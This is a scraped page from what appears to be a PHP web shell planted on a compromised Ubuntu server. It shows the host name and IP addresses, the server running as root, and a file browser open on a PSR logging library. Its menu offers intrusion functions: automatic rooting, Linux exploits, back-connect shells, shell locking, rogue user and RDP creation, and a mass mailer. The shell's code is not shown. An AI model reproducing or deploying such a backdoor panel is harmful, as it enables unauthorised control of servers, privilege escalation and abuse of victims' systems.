Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
Psr /
Log /
[ HOME SHELL ]
Name
Size
Permission
Action
Test
[ DIR ]
drwxr-xr-x
AbstractLogger.php
3.02
KB
-rw-r--r--
InvalidArgumentException.php
96
B
-rw-r--r--
LogLevel.php
336
B
-rw-r--r--
LoggerAwareInterface.php
297
B
-rw-r--r--
LoggerAwareTrait.php
397
B
-rw-r--r--
LoggerInterface.php
2.97
KB
-rw-r--r--
LoggerTrait.php
3.28
KB
-rw-r--r--
NullLogger.php
651
B
-rw-r--r--
autoload.php
1.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LogLevel.php
<?php namespace Psr\Log; /** * Describes log levels. */ class LogLevel { const EMERGENCY = 'emergency'; const ALERT = 'alert'; const CRITICAL = 'critical'; const ERROR = 'error'; const WARNING = 'warning'; const NOTICE = 'notice'; const INFO = 'info'; const DEBUG = 'debug'; }
Close